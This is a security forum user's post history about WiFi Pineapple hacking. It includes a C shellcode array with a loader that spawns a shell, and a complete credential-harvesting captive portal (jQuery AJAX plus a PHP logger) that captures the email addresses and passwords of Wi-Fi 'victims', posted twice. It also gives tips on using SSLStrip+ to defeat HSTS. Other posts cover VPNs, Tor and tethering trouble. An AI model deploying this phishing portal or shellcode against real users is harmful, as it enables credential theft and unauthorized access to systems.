sud0nick
-
Posts
1,056 -
Joined
-
Last visited
-
Days Won
66
Posts posted by sud0nick
-
-
So do you tend to code your shellcode instructions in assembly first, or C, or do you just know what machine instructions do what? I kinda know in theory how an exploit works, just haven't ever made one from start to finish completely. Shell code seems to be the last hurdle (that and reversing).
You typically write your shellcode instructions in assembly first. The C program you need will inject the shellcode (in hex format) into memory. Here is an example of shellcode in a C array:
char shellcode[] = "\x31\xc0\x31\xdb\x31\xc9\x99\xb0" "\xa4\xcd\x80\x6a\x0b\x58\x51\x68" "\x2f\x2f\x73\x68\x2f\x62\x69\x6e" "\x89\xe3\x51\x89\xe2\x53\x89\xe1" "\xcd\x80"; int main(void) { int *ret; ret = (int *)&ret + 2; (*ret) = (int)shellcode; }I also wrote a C program a few years back, called sheller, to automatically take a .bin file and dump the hexcode into a C array in either a C or C++ program. You can check it out here: https://forum.intern0t.org/c-c/3791-sheller.html
The only dependency required for sheller is hexdump.
*EDIT: If you are a C guy and check out my program, I know it uses the goto and system functions. I was new to programming back then. Nevertheless, the program works.
-
Shellcode can be difficult and it may take awhile to study it. Essentially, it is the hex version of machine instructions, written in assembly, that gives an attacker access to a shell by exploiting a vulnerability in a program. This means your code will have to be tailored to the processor architecture you are working with as each architecture consists of different instruction sets. After you write the assembly code you will need to create the hex version of it (this is the shellcode) and place it in a C program that can inject the code into memory. A good guide is The Shellcoder's Handbook (http://www.amazon.com/The-Shellcoders-Handbook-Discovering-Exploiting/dp/047008023X) and I'm sure you can find some information online.
-
I found this list http://torrentfreak.com/which-vpn-services-take-your-anonymity-seriously-2014-edition-140315/ on the [How To] Tunnel MK5 through VPN thread. I'm considering using Private Internet Access myself.
-
hi darren i see that you recommend Tor, and i like the concept of Tor ,but i also read The NSA targets it and is also primarily funded by the US government, so how can i have any trust in it.
I've heard about this, too. It actually came up when I was taking the Certified Ethical Hacker course and I feel it can't truly be trusted.
-
Posting this here because newbi3 asked me to. This goes outside the scope of the support for Evil Portal so don't ask any questions about it here. This is strictly for everyone's information.
For those having issues using PHP I have a solution I discovered today. If you place your PHP, JavaScript, and CSS files in the /www directory you can import them into the splash.html page by using your Pineapple's IP address that is also recorded in the preauthenticated_users area of the Evil Portal configuration. Here are some examples of how I got an Ajax call to send the username and password entered by a victim to an auth.php script and log it to auth.log.
Within splash.html
<script src="//172.16.42.1/nodogsplash/jquery.min.js"></script>
As you can probably guess in /www I created a new directory called nodogsplash and placed my jquery.min.js file there. This way when the splash.html page tries to access it on behalf of the victim it doesn't return the splash.html page code (due to a redirect not allowing the user past the captive portal). This same method can be applied to your PHP scripts.
<script> $(function() { $("#submit_button").on("click", function() { var email_addr = $('#email').val(); var pass = $('#password').val(); if (email_addr == "" || pass == "") { alert("Please login with your Facebook or Google account to access free Wi-Fi."); return; } else { $.ajax({ type: "POST", url: "//172.16.42.1/nodogsplash/auth.php", data: {email: email_addr, password: pass}, dataType: 'json', success: function(data, textStatus, jqXHR) { window.location.href="$authtarget"; }, error: function(data, textStatus, errorThrown) { window.location.href="$authtarget"; } }); } }); }); </script>In the code above I first perform a check to ensure the victim has entered their username and password then send the data off to my auth.php script in /www/nodogsplash where it is logged in auth.log. Right now it authenticates the user regardless of whether the call to auth.php was successful or not but I'll change that soon.
And just for the purpose of completion here is my auth.php script so you can see exactly what is happening when the AJAX call is made.
<?php if (isset($_POST['email'])) { $fh = fopen('auth.log', 'a+'); fwrite($fh, "Email: " . $_POST['email'] . "\n"); fwrite($fh, "Pass: " . $_POST['password'] . "\n\n"); fclose($fh); return; } else { header('Location: splash.html'); } ?>I have tested this and it works for me so I hope this helps everyone who is having trouble with using JavaScript and PHP in nodogsplash.
-
That's interesting and I'll have to check it out but do you have any insight toward a solution to my current problem?
-
I'm having some trouble getting out to the internet with my Pineapple while it is tethered to my Sprint GS4. While the phone is connected to my home router via WiFi the Pineapple can ping 8.8.8.8 just fine. Once I change the connection to 4G LTE the Pineapple can no longer ping 8.8.8.8. I have performed many different tests and have yet to solve this problem. Any help is appreciated.
Extra info:
1. Using the Ping & DNS app on the GS4 I have verified that my phone can get out to the internet (view attachment).
2. The Pineapple can ping both IP addresses shown in the network info of the phone and I have tried setting the default gateway of the Pineapple to both of these addresses as well as the address of its own usb0 interface.
3. Something strange I came across is if I try to ping google.com or facebook.com from the Pineapple it resolves the IP but it still can't ping out.
4. I have also ran the appropriate iptables commands from other guides even though, if I understand correctly, that is simply to route clients out to the internet. I should still be able to ping 8.8.8.8 from the Pineapple without this modification.
-
bytedeez,
Look at my post on Evil Portal - Captive Portal. You should be able to get all of this to work pretty easily and it should redirect automatically after you log the credentials if you use
window.location.href = "$authtarget";
Also, why are you going through the hassle of creating an AJAX call with vanilla JavaScript? You would be able to clean up your code a lot if you use the JQuery function.
-
I know this topic is a little old now but I recently bought a Mark V and started playing with this awesome infusion yesterday. For those having issues using PHP I have a solution I discovered today. If you place your PHP, JavaScript, and CSS files in the /www directory you can import them into the splash.html page by using your Pineapple's IP address that is also recorded in the preauthenticated_users area of the Evil Portal configuration. Here are some examples of how I got an Ajax call to send the username and password entered by a victim to an auth.php script and log it to auth.log.
Within splash.html
<script src="//172.16.42.1/nodogsplash/jquery.min.js"></script>
As you can probably guess in /www I created a new directory called nodogsplash and placed my jquery.min.js file there. This way when the splash.html page tries to access it on behalf of the victim it doesn't return the splash.html page code (due to a redirect not allowing the user past the captive portal). This same method can be applied to your PHP scripts.
<script> $(function() { $("#submit_button").on("click", function() { var email_addr = $('#email').val(); var pass = $('#password').val(); if (email_addr == "" || pass == "") { alert("Please login with your Facebook or Google account to access free Wi-Fi."); return; } else { $.ajax({ type: "POST", url: "//172.16.42.1/nodogsplash/auth.php", data: {email: email_addr, password: pass}, dataType: 'json', success: function(data, textStatus, jqXHR) { window.location.href="$authtarget"; }, error: function(data, textStatus, errorThrown) { window.location.href="$authtarget"; } }); } }); }); </script>In the code above I first perform a check to ensure the victim has entered their username and password then send the data off to my auth.php script in /www/nodogsplash where it is logged in auth.log. Right now it authenticates the user regardless of whether the call to auth.php was successful or not but I'll change that soon.
And just for the purpose of completion here is my auth.php script so you can see exactly what is happening when the AJAX call is made.
<?php if (isset($_POST['email'])) { $fh = fopen('auth.log', 'a+'); fwrite($fh, "Email: " . $_POST['email'] . "\n"); fwrite($fh, "Pass: " . $_POST['password'] . "\n\n"); fclose($fh); echo json_encode(array("key", "val")); return; } else { header('Location: splash.html'); } ?>I have tested this and it works for me so I hope this helps everyone who is having trouble with using JavaScript and PHP in nodogsplash.
sslstrip not working in 2.04
in WiFi Pineapple Mark V
Posted
Browsers these days use HTTP Strict Transport Security (HSTS) which prevents attacks from sslstrip. I have only been able to make it work with Safari on a MacBook. SSLStrip+ apparently defeats HSTS but I have not tried it personally. You could probably set up an evil access point with Kali Linux on a Raspberry Pi and run SSLStrip+ to get the results you want.